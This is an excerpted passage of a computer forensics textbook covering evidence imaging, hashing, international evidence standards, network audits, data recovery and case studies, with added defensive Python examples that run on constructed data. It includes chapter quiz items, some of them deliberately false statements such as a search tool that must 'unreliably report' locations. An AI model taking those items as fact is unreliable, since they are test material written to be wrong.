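
def stat_entry(path):
    """Timestamps stored for one file. ctime is inode-change time on Unix and
    creation time on Windows; birthtime exists only on some platforms."""
    st = os.lstat(path)                      # lstat: metadata only, no content read
    return {"size": st.st_size, "mtime": iso(st.st_mtime),
            "atime": iso(st.st_atime), "ctime": iso(st.st_ctime),
            "birthtime": iso(st.st_birthtime) if hasattr(st, "st_birthtime") else None}

def snapshot(root):
    """Map relative path (forward slashes) -> timestamps for everything under root."""
    listing = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            listing[os.path.relpath(full, root).replace(os.sep, "/")] = stat_entry(full)
    return listing

def diff_snapshots(before, after):
    """(path, field, old, new) for every timestamp or size that changed, plus
    entries that appeared or disappeared between the two listings."""
    changes = []
    for path in sorted(set(before) | set(after)):
        if path not in after:
            changes.append((path, "deleted", before[path], None))
            continue
        if path not in before:
            changes.append((path, "created", None, after[path]))
            continue
        for field in FIELDS:
            if before[path].get(field) != after[path].get(field):
                changes.append((path, field, before[path][field], after[path][field]))
    return changes

def demo():
    """Snapshot a constructed tree, read a file the naive way (plain open()),
    and report what the read changed. On a file system mounted noatime the
    list is empty; under relatime or strictatime the atime of notes.txt (and
    possibly of the directory that was listed) moves, which is exactly what
    the pre-search snapshot preserves."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "docs"))
    with open(os.path.join(root, "docs", "notes.txt"), "w") as f:
        f.write("constructed sample content\n")
    before = snapshot(root)
    with open(os.path.join(root, "docs", "notes.txt")) as f:   # a naive search tool
        f.read()
    return before, diff_snapshots(before, snapshot(root))
```

Whether anything changes depends on the mount options of the media being searched, which is why the snapshot is taken unconditionally rather than after checking those options.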
...
In most cases, the minimum standard at a file
level has been the CRC algorithm, but for very large files, the MD5 algorithm is preferred; note that a CRC only detects accidental corruption, since a file can be adjusted to produce any chosen CRC, so where the digest must show that content has not been deliberately altered, a cryptographic hash (MD5, or today SHA-256) should be used regardless of file size
...
Special files include encrypted, compressed, or password-protected files; steganographic carrier
files; graphics, video, and audio files; format files; executable files or binary data
files; files housing email archives or active email content; swap files or virtual memory files; and other such file formats that obscure their plain text content
...
Other types of special files, such as encryption or steganography, may require a more dedicated effort to bypass the security mechanisms
...
This would also include identifying and searching all free
(unallocated) space, identifying relevant file headers in free space, identifying
deleted directories in free space, including directory entries for deleted files, and recovering deleted directory entries as well as all pertinent deleted files that are not
overwritten
...
The criteria for forensically sound media images is fairly straightforward: the image must include a true,
validated copy of every bit of every byte contained on the media, without regard to
media contents, from the absolute beginning of the media to the end of the physical device
...
In today’s world of smart cards
and “computer memory cards,” where cameras can store hundreds of pictures on
memory cards (where these cards can supply memory to portable or handheld devices), the variety of media investigators are faced with is ever-widening
...
New imaging and analysis tools must keep apace
...
This requirement stems from a need to be able to run applications installed on drives that have been preserved as evidence
...
Today’s large applications rely on installation processes that do more
than just copy the application files to the media, so running the application in its
installed environment may be necessary
...
Perform a Sector-by-Sector Comparison
To verify that one piece of media is an identical copy of another, investigators typically use media hashes of some type
...
In most cases, simply knowing that two pieces of media have
different hashes will not give you an indication of where on the media the difference
occurs
...
This tool could verify
that any differences between the original and the copy are confined to trailing sectors that exist only on the larger device and are filled with
padding (normally zeros), so that they are accounted for by geometry differences alone
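The whole-media hash required earlier (every byte of every sector from sector 0 to the last physical sector) and the sector-by-sector comparison described here share the same loop over the device. The following is an added example, not code from the book or any product: it hashes a constructed image in full, and when two images differ it reports which LBAs differ and separates zero-filled trailing sectors (the geometry-padding case) from trailing sectors that carry data. Sector size and the images are constructed.

```python
"""Added example, not from the book: hash a media image in full (every byte of
every sector from LBA 0 to the last physical sector, ignoring any partition or
file-system layout) and, when two images do not hash the same, compare them
sector by sector to report exactly which LBAs differ. Trailing sectors that
exist only on the larger device and are zero-filled are classified as
geometry padding, the benign case the text describes. Sector size and the
images are constructed."""
import hashlib

SECTOR = 512

def media_hash(image, algo="sha256", sector=SECTOR):
    """Digest of the whole device, computed sector by sector as a tool reading
    a real disk would. Pass algo="md5" for the legacy digest the text prefers."""
    h = hashlib.new(algo)
    for start in range(0, len(image), sector):
        h.update(image[start:start + sector])
    return h.hexdigest()

def sector_count(image, sector=SECTOR):
    return -(-len(image) // sector)            # ceiling division: a partial last sector counts

def compare_sectors(a, b, sector=SECTOR):
    """LBAs where a and b differ within their common length, plus the extra
    sectors of the longer image split into zero-filled padding and sectors
    that carry data (which no geometry difference can explain)."""
    n_a, n_b = sector_count(a, sector), sector_count(b, sector)
    common = min(n_a, n_b)
    differing = [lba for lba in range(common)
                 if a[lba * sector:(lba + 1) * sector] != b[lba * sector:(lba + 1) * sector]]
    longer = a if n_a > n_b else b
    padding, unexplained = [], []
    for lba in range(common, max(n_a, n_b)):
        chunk = longer[lba * sector:(lba + 1) * sector]
        (padding if chunk.count(0) == len(chunk) else unexplained).append(lba)
    return {"differing": differing, "padding": padding, "unexplained": unexplained}

def images_equivalent(a, b, sector=SECTOR):
    """True when the only differences are zero-filled trailing sectors."""
    report = compare_sectors(a, b, sector)
    return not report["differing"] and not report["unexplained"]

def build_images():
    """Constructed data: an 8-sector original and two copies made onto a
    10-sector device. The good copy differs only by two zero-filled sectors;
    the bad copy also has one altered byte in LBA 5 and data in LBA 9."""
    original = b"".join(bytes([i]) * SECTOR for i in range(1, 9))
    good_copy = original + bytes(2 * SECTOR)
    bad_copy = bytearray(good_copy)
    bad_copy[5 * SECTOR + 100] ^= 0xFF
    bad_copy[9 * SECTOR] = 0x41
    return original, good_copy, bytes(bad_copy)

def demo():
    original, good_copy, bad_copy = build_images()
    return {
        "hashes_match": media_hash(original) == media_hash(good_copy),   # False: lengths differ
        "good_equivalent": images_equivalent(original, good_copy),        # True
        "bad_report": compare_sectors(original, bad_copy),
    }
```

The whole-media hashes of the original and the good copy never match, because the copy is longer; that is the situation in which the sector comparison, rather than the hash alone, tells the examiner whether the difference is harmless.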
...
If the software is self-documenting and certain
reports are automatically generated for the user, based on the results of exercising
the capabilities of the software, this could help make reporting results much simpler
...
This next part of the chapter recommends the establishment of computer forensics standards for the exchange of
digital evidence between sovereign nations and is intended to elicit constructive
discussion regarding digital evidence
...
As a result, the world changed from analog to digital
...
An entire constellation of audio, video, communications,
and photographic devices are becoming so closely associated with the computer as
to have converged with it
...
The connectivity resulting from a single world economy in which the companies providing goods and services are truly international has enabled criminals to
act transjurisdictionally with ease
...
This situation requires that all nations have the ability to collect and preserve
digital evidence for their own needs as well as for the potential needs of other sovereigns
...
Although it is not reasonable to expect all nations to know about and abide by
the precise laws and rules of other countries, a means that will allow the exchange
of evidence must be found
...
Standards
To ensure that digital evidence is collected, preserved, examined, and transferred in
a manner that safeguards the accuracy and reliability of the evidence, law enforcement and forensic organizations must establish and maintain an effective quality
system
...
Standards and Criteria
All agencies and organizations that seize or examine digital evidence must maintain
an appropriate SOP document
...
The use of SOPs is fundamental to both law enforcement and forensic science
...
The development and implementation of these SOPs must be under an organization’s management authority
...
Rapid technological changes are the hallmark of
digital evidence, with the types, formats, and methods for seizing and examining
digital evidence changing quickly
...
Procedures used must be generally accepted in the field or supported by data
gathered and recorded in a scientific manner
...
The validity of a procedure may be
established by demonstrating the accuracy and reliability of specific techniques
...
The organization must maintain written copies of appropriate technical procedures
...
Required elements such as hardware and software must be listed, and the proper
steps for successful use should be listed or discussed
...
Personnel who use these procedures must be familiar with them and have them available for reference
...
Although many acceptable procedures may be used to perform a task, considerable variation among cases requires
that personnel have the flexibility to exercise judgment in selecting a method appropriate to the problem
...
Software
must be tested to ensure that it produces reliable results for use in seizure and
examination
...
In
general, documentation to support conclusions must be such that, in the absence
of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator
...
Chain-of-custody documentation must be maintained for all digital evidence
...
Handwritten notes and observations must be in ink, not pencil, although pencil (including color) may be appropriate for diagrams or making tracings
...
Notes and records should be authenticated
by handwritten signatures, initials, digital signatures, or other marking systems
...
As discussed in the preceding standards and criteria, evidence has value
only if it can be shown to be accurate, reliable, and controlled
...
Finally, now that the establishment of computer forensics standards has been
made, it is time to recommend some auditing techniques
...
Computer Forensics Auditing Techniques
Companies that believe their networks and the Internet can be completely protected by a phalanx of add-on computer forensics and security products may be in
for a rude awakening
...
Computer forensics and security-auditing companies can give a company expert analysis of obscure but potentially devastating loopholes, along with estimates
of cost versus risk for each of many possible approaches to address them—and a
basis for deciding whether spending a little more money up front will save much
more in the long run
...
How to Audit Your Network and Internet Security Policies with Computer Forensics Techniques
The Internet has allowed businesses to communicate in new and strategic ways
with various types of people and organizations
...
Instead, they have to fight for the resources to secure it
...
The Internet Octopus
Over the years, you have added feature upon feature to your Internet and network
connections
...
In the beginning, services such as simple POP3-style email and Web access were the extent of
an Internet connection
...
During all these changes in the past few years, you have probably changed IT personnel, Internet platforms, and network connections at least
once
...
Any network connection to the Internet is vulnerable to exploitation
...
Today, you are finding more intelligent defenses against attacks such as denial-of-service attacks, as
routers and other devices can be set to verify source addresses (ingress filtering, or unicast reverse-path forwarding checks) and drop packets whose
source is bogus or whose pattern is suspicious
...
Many organizations have grown their Internet set of features across multiple
devices or possibly multiple network connections—a firewall for Web and email
traffic, a VPN appliance for remote connections, a different firewall for a businessto-business relationship, or other possible combinations of lines and devices that
can push Internet vulnerabilities beyond control
...
Regardless of the number of devices that are on the Internet, each has
different services that can be potentially exploited
...
What You Can Do
There are a number of things you can do to keep your network connections secure
and to keep business running as usual
...
Check for any manufacturer or service provider default passwords that may be
easily known or guessed
...
Beware of potential internal threats
...
After this basic housekeeping is completed, it’s important to perform a “vulnerability chain assessment” with your computer forensics tools on your own
...
A vulnerability chain assessment tells administrators what is affected by what and
who potential perpetrators could be
...
For each item, consider the potential vulnerabilities that could cause an interruption of service:
Internet (outside of your router): Internet being unavailable from your carrier
or region, phone line cut, denial of service, and so on
...
Internet router: ISP configuration may have well-known default passwords;
this could reroute all incoming mail, shut down an interface, or adversely affect
performance by some other means
...
VPN appliance and firewall: Security compromise, stale VPN accounts or vendor
default account, unwanted services, failure of device, and so on
...
Obtain Peace of Mind
One thing you can do to bring some validity to your efforts is to get an external opinion of your Internet and network security
...
A third-party piece of computer forensic auditing software or original equipment
manufacturer (OEM-provided) tool to examine security issues
...
The professional hacker approach is recommended, but you have to be careful
...
You want a professional hacker to do more than call vendors asking for passwords and back-door methods
...
These third-party computer forensic examinations can yield beneficial information to solidify a security strategy
...
It’s a wonderful feeling to present management with a report saying that this
external group is impressed with the security of your Internet presence
...
You
can also find Web sites that host information on how to exploit specific products
...
There are countless free or time-trial pieces of computer forensics auditing
software you can use to peek at your connection, but be careful
...
One of the things that is also very important is your ability to distribute risk
...
However, the better you distribute risk, the more expensive things become
...
Have an alternate Internet connection
...
Put up a honeypot to attract or distract would-be hackers
...
company
...
Proactively renew or cancel your Internet service provider agreement before it
expires or before the carrier contacts you
...
With a bit of diligence, you can keep your Internet and network security at
peak, which will protect the business goals of the organization
...
FINAL WORD: COMPUTER FORENSIC NEEDS AND CHALLENGES
Reporting of economic and cyber crime is problematic and grossly underestimated,
as is apparent from the many risks associated with corporations’ reporting or sharing fraud losses and activity
...
The Fraud Identification Codes established by the National Fraud Center are a
start
...
Uniform and thorough reporting is necessary in the war on economic and
cyber crime; resources for computer forensics investigation and prosecution will
naturally follow as the enormity of the problem unfolds
...
Academics have not been able to agree on definitions and have, for the
most part, continued to focus on white-collar crime
...
To this day, the true nature of the amount of economic crime is buried in the statistics of more conventional crimes
...
Preventing, detecting, investigating, and prosecuting economic crimes must
become a priority in order to lessen their impact on the economy and the public’s
confidence
...
New resources, support for existing organizations (the National Fraud Center, the National White Collar Crime Center, the
IFC, and the Economic Crime Investigation Institute), and innovative computer
forensics solutions are needed to control this growing problem in the United States
and the world
...
All stakeholders
must be more willing to exchange information on the effect economic and cyber
crime has on them and the methods they are using to detect and prevent it
...
In fact, industry has more resources than government, but it must be motivated
and authorized to partner and communicate
...
The victims need to follow the lead of the criminals and organize
themselves, so that the organized bad guys are not operating in a lawless environment, where culpability is at a minimum
...
Current and future administrations must
recognize the full impact of economic and cyber crime, both domestically and globally, and make a concerted, strategic effort to combat it, for the benefit of all society
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? When dealing with digital evidence, all the standard forensic and
procedural principles must not be applied
...
True or False? Upon seizing digital evidence, actions taken should not change
that evidence
...
True or False? People who access original digital evidence should not be trained
for the purpose
...
True or False? All activity relating to the seizure, access, storage, or transfer of
digital evidence must be fully documented, preserved, and available for review
...
True or False? Individuals are responsible for all actions taken with respect to
digital evidence while such evidence is in their possession
...
To help create cooperation between the United States and other nations, the G8
group of major industrialized nations has proposed six principles for procedures
relating to digital evidence, which it defines as information stored or transmitted in
binary form that may be relied on in court:
A
...
B
...
C
...
D
...
E
...
2
...
An investigator requires a capability to simultaneously preview a large number of systems on site to determine which ones contain relevant evidence
...
An investigator requires the capability to conduct a search at the physical
level of the target media, ignoring operating system and file system logical
structures, and searching from sector 0 to the end of the media regardless
of the logical content
...
The search tool must be able to unreliably report the physical location on
the media where responsive data were found
...
An investigator requires the capability to conduct a thorough, read-only
search at the logical level of the target media
...
An investigator requires an ability to generate a listing of all logical files in
a file system
...
There are a number of things you can do to keep your network connections
secure and to keep business running as usual
...
Verify that there are no accounts for terminated employees
...
Check for any manufacturer or service provider default passwords that
may be easily known or guessed
...
Verify that any temporary services or open ports are disabled
...
Beware of potential external threats
...
Have the mindset of “deny all except that which is explicitly stated in the
rule set”
...
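The checklist above can be expressed as an audit that is run rather than read. What follows is an added example and not code from the book: the account list, termination list, port baseline and firewall rules are all constructed for the demonstration. The policy evaluator implements the last item literally: a flow is allowed only if an explicit rule matches it, and everything else is denied.

```python
import ipaddress

# Constructed inputs for this demonstration (hypothetical hosts and rules).
ACCOUNTS = {"alice", "bob", "svc_backup", "cwilliams", "admin"}
TERMINATED = {"cwilliams"}                 # from the HR termination list
APPROVED_PORTS = {22, 443}                 # services the router should expose
OPEN_PORTS = {22, 443, 8080, 23}           # what a port scan of the router found

# Explicit allow rules; any flow not matched by one of them is denied.
RULES = [
    {"src": "0.0.0.0/0",  "dst": "192.0.2.10/32", "port": 443, "proto": "tcp"},
    {"src": "10.0.0.0/8", "dst": "192.0.2.10/32", "port": 22,  "proto": "tcp"},
]


def orphaned_accounts(accounts, terminated):
    """Accounts that still exist for people on the termination list."""
    return sorted(accounts & terminated)


def unapproved_ports(open_ports, approved):
    """Listening ports that are not in the approved baseline (temporary
    services, telnet, test instances left running)."""
    return sorted(open_ports - approved)


def rule_matches(rule, flow):
    return (ipaddress.ip_address(flow["src"]) in ipaddress.ip_network(rule["src"])
            and ipaddress.ip_address(flow["dst"]) in ipaddress.ip_network(rule["dst"])
            and flow["port"] == rule["port"]
            and flow["proto"] == rule["proto"])


def evaluate(rules, flow):
    """Default deny: 'allow' only when an explicit rule matches."""
    return "allow" if any(rule_matches(r, flow) for r in rules) else "deny"


def audit():
    flows = [
        {"src": "203.0.113.5", "dst": "192.0.2.10", "port": 443, "proto": "tcp"},
        {"src": "203.0.113.5", "dst": "192.0.2.10", "port": 22, "proto": "tcp"},
        {"src": "10.1.2.3", "dst": "192.0.2.10", "port": 22, "proto": "tcp"},
        {"src": "10.1.2.3", "dst": "192.0.2.10", "port": 8080, "proto": "tcp"},
    ]
    return {
        "orphaned": orphaned_accounts(ACCOUNTS, TERMINATED),
        "unapproved_ports": unapproved_ports(OPEN_PORTS, APPROVED_PORTS),
        "decisions": [evaluate(RULES, f) for f in flows],
    }


if __name__ == "__main__":
    print(audit())
```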
All the items listed below have vulnerabilities—some of which are beyond your
control
...
Internet (outside of your router)
B
...
Internet router
D
...
VPN appliance and IDS
5
...
You can obtain this opinion via
the following, except:
A
...
B
...
C
...
D
...
Exercise
When a leading United States–based drug manufacturer’s financial audit team received a tip that certain employees were suspected of performing fraudulent actions, they responded immediately by launching a full-scale investigation
...
First, the fraudulent activity was
occurring on the other side of the globe at the company’s Middle East office
...
Traditionally,
an effective investigation would require the investigation staff to travel to the remote location
...
In addition to fraud having a potentially serious impact on a company’s bottom line, Sarbanes-Oxley mandates that public companies have a diligent, internal fraud investigation capability
...
This required the
diligent and thorough investigation of all relevant Middle East–based computer
activity, which could not be performed by local IT staff, as they were potential suspects
...
How was the
CFST able to go about conducting their investigations?
WHY COMPUTER FORENSICS?
The vast majority of documents now exist in electronic form
...
Computer forensics
ensures the preservation and authentication of computer data, which is fragile by
its nature and can be easily altered, erased, or subject to claims of tampering without proper handling
...
WHAT IS DATA RECOVERY?
Data recovery is the process of retrieving deleted or inaccessible data from failed
electronic storage media such as computer hard disk drives, removable media, optical
devices, and tape cartridges
...
Regardless of the cause of your data loss, your experienced technicians
should be able to successfully recover lost data 80 to 85% of the time
...
Expedited Data Recovery
If you should need this service, you need a dedicated technician assigned to your
drive within 4 hours of the time that you send in your hard disk
...
Emergency Data Recovery
If your situation is critical, you will need to make arrangements for a technician to be
available who will be assigned to work on your recovery until it is completed
...
However, because
of the complexity of data recovery, there will be times when it will take longer
...
There are instances when the damage to the hard drive is so severe that data recovery is not possible
...
However, in a number of cases, data recovery was possible at the time the damage first occurred, but the data became nonrecoverable through the use of commercial recovery software
...
If your drive has experienced a mechanical or electrical failure, the use of recovery software can cause permanent loss of your data
...
Although your hard drive has many electronic components, it also has moving
parts
...
Avoid Heat and Vibration
All drive components, both electronic and mechanical, are sensitive to heat and vibration
...
Set up your computer in an area with little traffic to ensure that it does
not get bumped
...
Also, beware of static
...
If you don’t have a tape backup device or network drive at your fingertips,
back up your most important files to a floppy disk at least once a week
...
Run it every two or three weeks just to be safe
...
Run Defrag Frequently
Files will most likely not be stored in adjacent clusters
...
This is
essential for data recovery because success is more likely when the damaged file’s
clusters are adjacent to each other
...
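The point about adjacent clusters can be shown with a simple header/footer carver, the technique recovery tools fall back on when the file system no longer points at a file. This is an added example, not code from the book: it constructs an image in which one PDF-like document sits in two contiguous clusters and a second one is split across two clusters with an unrelated file between them, then carves both. The signatures, cluster size and layout are assumptions for the demonstration.

```python
import hashlib
import os
import tempfile

SECTOR = 512
CLUSTER = 4 * SECTOR                    # assumed 2 KiB clusters
HEADER, FOOTER = b"%PDF-", b"%%EOF"     # PDF-style carving signatures


def make_doc(tag, size):
    """Construct a fake PDF-like document of exactly `size` bytes."""
    body = HEADER + b"1.4\n" + tag * (size // len(tag) + 1)
    return body[: size - len(FOOTER)] + FOOTER


def build_sample_image(path):
    """Constructed layout: document A in clusters 0-1 (contiguous),
    document B split across clusters 3 and 5 with an unrelated file in
    cluster 4 between its halves (fragmented). Returns the originals."""
    doc_a = make_doc(b"report A text ", 2 * CLUSTER)
    doc_b = make_doc(b"report B text ", 2 * CLUSTER)
    other = b"unrelated spreadsheet rows ".ljust(CLUSTER, b" ")[:CLUSTER]
    img = bytearray(8 * CLUSTER)
    img[0 * CLUSTER:2 * CLUSTER] = doc_a
    img[3 * CLUSTER:4 * CLUSTER] = doc_b[:CLUSTER]
    img[4 * CLUSTER:5 * CLUSTER] = other
    img[5 * CLUSTER:6 * CLUSTER] = doc_b[CLUSTER:]
    with open(path, "wb") as fh:
        fh.write(img)
    return doc_a, doc_b


def carve(path):
    """Header/footer carving: for every header, take everything up to the
    next footer. Correct for contiguous files; a fragmented file comes
    back with whatever lies between its fragments included."""
    with open(path, "rb") as fh:
        data = fh.read()
    carved, pos = [], 0
    while True:
        h = data.find(HEADER, pos)
        if h < 0:
            break
        f = data.find(FOOTER, h)
        if f < 0:
            break
        end = f + len(FOOTER)
        carved.append(data[h:end])
        pos = end
    return carved


def digest(blob):
    return hashlib.sha256(blob).hexdigest()


def demo():
    fd, path = tempfile.mkstemp(suffix=".dd")
    os.close(fd)
    try:
        doc_a, doc_b = build_sample_image(path)
        recovered = carve(path)
    finally:
        os.unlink(path)
    return {
        "contiguous_ok": digest(recovered[0]) == digest(doc_a),
        "fragmented_ok": digest(recovered[1]) == digest(doc_b),
        "fragmented_size": len(recovered[1]),
        "expected_size": len(doc_b),
    }


if __name__ == "__main__":
    print(demo())
```

The contiguous document carves back byte for byte; the fragmented one comes back a cluster too long with foreign data in the middle, which is exactly why a defragmented drive recovers more easily. The advice applies to the drive you are protecting, not to evidence: running a defragmenter on a suspect drive overwrites unallocated space and destroys the very deleted data an examiner would carve.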
Also, use an uninterruptible power supply (UPS)
...
A UPS is also a backup power source that keeps your computer running for a
short period of time, giving you the opportunity to properly save your work and
shut down, avoiding a potential data loss
...
Verify that your utility software is
compatible with your operating software
...
Always make an undo disk when
you allow a utility to make changes to your hard drive
...
Only your drive is required for data recovery
...
If an antistatic bag is not available, a
freezer bag will suffice
...
If this is not possible, pack the hard drive in a sturdy
corrugated cardboard box twice the size of the drive, with heavy foam padding,
bubble wrap, or other antivibration materials
...
Be sure the padding material is at least two inches
thick around the drive
...
Enclose the drive
along with a damp sponge in a sealed plastic bag to prevent it from drying out
...
Remove the controller carefully, enclose it in antistatic material, and ship it along with the drive
...
Locations
Ship the drive directly to the recovery facility nearest you: It is recommended that
you ship via UPS or Federal Express domestically and DHL internationally, using
next-day service
...
Also, if you have any special shipping considerations, questions,
or concerns, please contact your overnight carrier
...
When your data is recovered and your drive is not repairable, there are many different ways to return your data, including a new drive,
magnetic tapes, Zip cartridges, or CD-ROM
...
They are offered as resources that other systems security and forensics professionals have found helpful
...
accessdata
...
AccessData’s site offers information
about this and other security-related tools, and you will find several free tools here
...
Digital Intelligence, Inc
...
digitalintelligence
...
They also offer free forensic utility software for law enforcement
...
net/)
This site is full of network security and information warfare articles and white papers
...
Guidance Software (http://www
...
com/)
Guidance is the creator of the popular GUI-based forensic tool EnCase
...
High Tech Crime Investigation Association (http://htcia
...
International Association of Computer Investigative Specialists (http://cops
...
Mares and Company, LLC (http://www
...
com/)
Mares has been authoring computer forensic tools for law enforcement for many
years
...
Information regarding Mares’ computer forensic training can also be found on this site
...
forensics-intl
...
There are also many good articles concerning
technical and legal issues surrounding computer forensics
...
org (http://www
...
org/wietse/)
This site is provided by Wietse Zweitze Venema, who provides tools and white
papers focused primarily on postmortem analysis of computer break-ins
...
(http://www
...
com/)
Sydex can take hundreds of different floppy and tape types and convert them to
Windows-readable files
...
They can also repair diskette data errors and perform
forensic analysis
...
The Coroner’s Toolkit (http://www
...
com/tct/)
The Coroner’s Toolkit is a collection of tools that are oriented toward either gathering or analyzing forensic data on a Unix system
...
tucofs
...
htm)
The TUCOFS Web site is a great collection of computer forensics resources and tools
...
(http://www
...
com/)
The sole purpose of this site is for information warfare and computer security
...
(http://www
...
com/page/page/1097778
...
This
site includes some excellent technical papers concerning advancing crime scene
computer forensics, timelining computer evidence, and using smart cards and digital signatures to preserve electronic evidence
...
cdt
...
With expertise in law, technology, and
policy, CDT seeks practical solutions to enhance free expression and privacy in
global communications technologies
...
FILE FORMATS AND EXTENSIONS
Computer Knowledge (http://filext
...
Although there is no guarantee that users will not rename files or associate odd extensions with particular programs, this site lists some fairly standard associations
...
wotsit
...
CRYPTOGRAPHY AND STEGANOGRAPHY
Counterpane Internet Security, Inc
...
counterpane
...
Free tools can also be found here
...
offers leading-edge expertise in the fields of 24/7 intrusion detection and prevention, preemptive threat discovery, forensic research, and organizational IT systems analysis
...
jjtc
...
Includes white papers on
steganalysis and countermeasures among other things
...
C
Links to Computer
Forensics and Related
Law Enforcement
Web Pages
Disclaimer: The author and publisher do not endorse the contents of the links in
this Appendix
...
LAW ENFORCEMENT LINKS
Computer Crimes and Technology Links
http://www
...
pinellas
...
us/bcc/juscoord/ecomputer
...
virtuallibrarian
...
mitretek
...
nsf/Main/BusinessAreas
Internet Resources on Technology Law
http://www
...
com/
Ira Wilsker’s Law Enforcement Sites on the Web
http://www
...
net/ira/ira
...
leolinks
...
ih2000
...
htm
Mega Links in Criminal Justice
http://faculty
...
edu/toconnor/
The Police Officer’s Internet Directory
http://www
...
com/
Web of Justice Links
http://www
...
pinellas
...
us/bcc/juscoord/explore
...
knock-knock
...
htm
ORGANIZATIONS
High Tech Crime Cops
http://www
...
org/
International Association of Computer Investigative Specialists
http://www
...
org/
MAILING LISTS
High Tech Crime Cops List
http://groups
...
com/subscribe
...
usdoj
...
htm
Update to USDOJ Guidelines
http://www
...
gov/criminal/cybercrime/supplement/ssgsup
...
http://www
...
com/download
...
computerforensics
...
htm
Computer Expert and Computer Forensics Consultant—Judd Robbins
http://www
...
net/
Computer Forensics Expert Witness Network
http://computerforensics
...
surveil
...
htm
Computer Forensics Online
http://www
...
com/cfo/
Florida Association of Computer Crime Investigators
http://facci
...
riskadvisory
...
html
CCIPS Searching and Seizing Computers
http://www
...
gov/criminal/cybercrime/searching
...
fdic
...
html
Infowar, Info-Sec Portal, Information Warfare and Security Global Clearinghouse,
Cyber Crime Reporting
http://www
...
com/
FOCUS on Incident Handling: An Introduction to the Field Guide for Investigating
Computer Crime
http://www
...
com/focus/ih/articles/crimeguide1
...
securityfocus
...
html
FOCUS on Incident Handling: Digital Media Forensics
http://www
...
com/focus/ih/articles/dforensics
...
securityfocus
...
html
SMO: Legal Reporter 06/00
http://www
...
com/library/000873
...
D
More Computer
Forensics Cases
Claims of six-figure salaries earned without ever leaving the bedroom
...
Credit-card accounts fished from fake porn sites or clever emails
promising “You’ve Got Pictures” that ask for AOL user names and passwords
...
So, what’s been the result? Fraud and credit-card theft have run rampant on the
Internet, and in-house corporate thieves abound
...
CASE STUDY 1: LOST FILES
A set of Word, Excel, and Project files that was created over 18 months relating to
a project currently under construction has been maliciously deleted by a departing
employee
...
The action was discovered 3 days later and
the IT group endeavored to locate and restore the files
...
Management is assessing the options available
...
Some data cannot be rekeyed in because the source data is missing
...
The firm finally restores the entire
project directory within 4 days from first contact
...
The PC was not on the network and not backed up
...
The tender closes at the end of the month,
which is only 12 days away
...
The only
option appears to be to withdraw from the tender process
...
The firm receives the hard disk at 4:00 P.M. on Friday and has a CD-ROM containing the draft
tender response, worksheets, subcontractor quotations, graphics files, and peripheral material on the client’s premises by 11:00 A.M. on the following Monday
...
The software-support company is unable to locate the files, and the
backup tapes do not restore correctly
...
Management is assessing their options
...
The distributor of the software recommends contact be made with a computer forensics firm
...
CASE STUDY 4: COMPUTER FORENSICS
The founder and majority shareholder of a consultancy business sold his interest to
a multinational communications corporation
...
After about a year, the client—the multinational—became suspicious that he was acting in breach of contract
...
At the outset, the firm suggested that the individual’s desktop and laptop computers be recovered to copy the hard disks and
analyze their contents
...
On his laptop, in a deleted file that was restored, the firm recovered details of
key clients and revenue streams
...
Taken together, the evidence was sufficient to initiate criminal proceedings
...
It was not clear whether this was simply a result of an inequitable transfer pricing policy within the group or whether the company had been defrauded
...
They discovered that other companies within the group had transferred products to the division at over market value to maintain their own profitability
...
The business manager was dismissed after the
computer forensics firm discovered that he had concealed ownership interests in
some of these customers and evidence came to light indicating that he had accepted
kickback payments
...
In the following period, the division was on track to report profits following tighter controls over transfer pricing and sales invoicing
...
The team visited the site and, using correct forensic
procedures, created an image of the hard drive of the suspect PC
...
Using this evidence and the report the team
produced, the client was able to take the appropriate action against the employee
...
The affected laptops were with field personnel and
away from the central office when the virus was introduced
...
The affected machines were
brought to the team’s secure laboratory, and, using forensic recovery techniques,
they were able to image data from the affected machines, recover all of the data that
had been stored since the machines had last been backed up, and eliminate the virus
...
It was suspected that a number of techniques had been used to plant spyware (remote control and covert information-gathering programs) on a network
...
A number of machines had been compromised after employees had opened email attachments that contained trojan
horse programs (programs that are disguised as common files but actually contain
malicious code)
...
As an added service, the team’s security engineers were able to offer
advice and assistance in reconfiguring antivirus and firewall products to minimize
the chance of a repeat occurrence
...
A family-owned product manufacturer and designer on the verge of being bought for many millions of dollars found most of its
designs missing after the departure of key managers and designers
...
An outside computer forensics consultant is
brought in to recover designs and overwrites evidence instead
...
The suspects finally admitted to the use of the utility
...
An individual working for a biomaterials firm gained employment with a
competing firm
...
The previous employer claimed that the individual took designs to the new employer on
diskettes
...
The original firm finally settled out of court
...
A computer forensics team was hired to check the results of a police report that suggested the client’s
guilt
...
Inconsistencies in the police report were discovered, and the sentence was mitigated
...
A foreign branch of the entertainment arm of a multinational conglomerate suspects that key managers had been attempting to incorporate company intellectual assets into a competing product line
...
Data backups were reported as missing
...
A computer forensics team was hired to investigate
...
CASE STUDY 13: FAMILY MEMBER STEALS CLIENTS
A member of a family-run communications business left the company
...
The
individual’s computer was identified as an asset of the original company
...
A computer forensics
team was hired to test the claim
...
The individual also claimed
innocence up until the moment that the team experts were seen awaiting a call into the
courtroom
...
CASE STUDY 14: ERASED EMAIL
A private investigation firm was purchased, with a covenant by the previous owners not to compete
...
A
computer forensics team was hired to look into the matter
...
CASE STUDY 15: BANK SUSPECTS
An employee of an FDIC-insured bank turned over a computer upon exiting from
his employer
...
In short order, the text of the suspect
emails, which showed the former employee’s culpability, was revealed
...
Within a few weeks, they started up a
new firm, producing similar products, in direct competition with the original firm
...
Evidence that the business plan and designs for a new firm were
taken directly from the original firm was uncovered
...
The former managers were given a 9-month injunction
...
A computer
forensics team was hired to show that the designs of the new company were stolen
from the original company
...
CASE STUDY 18: MODEL PURSUED
A wealthy suitor financed a young model
...
Inspection of the
model’s office computer was ordered
...
With advice from the computer forensics team, an inspection was effected
...
The suitor finally settled out of court
...
A computer forensics team was hired
...
CASE STUDY 20: TWO ATTORNEYS CAN’T SPEAK CIVILLY
Two attorneys couldn’t speak civilly to each other
...
The team brought the voice of reason to an acrimonious meeting
between attorneys, and calm prevailed while the truth of the matter was revealed in
the computer inspection
...
The manager was further accused of faking and falsely dating computer documents to support the claim of innocence
...
Information that was recovered by the team mitigated and diminished
claims against the client
...
A computer forensics team was hired to inspect hospital records of treatment
and meetings to support the medical provider’s innocence
...
CASE STUDY 23: FORMER EMPLOYEE CLAIMS
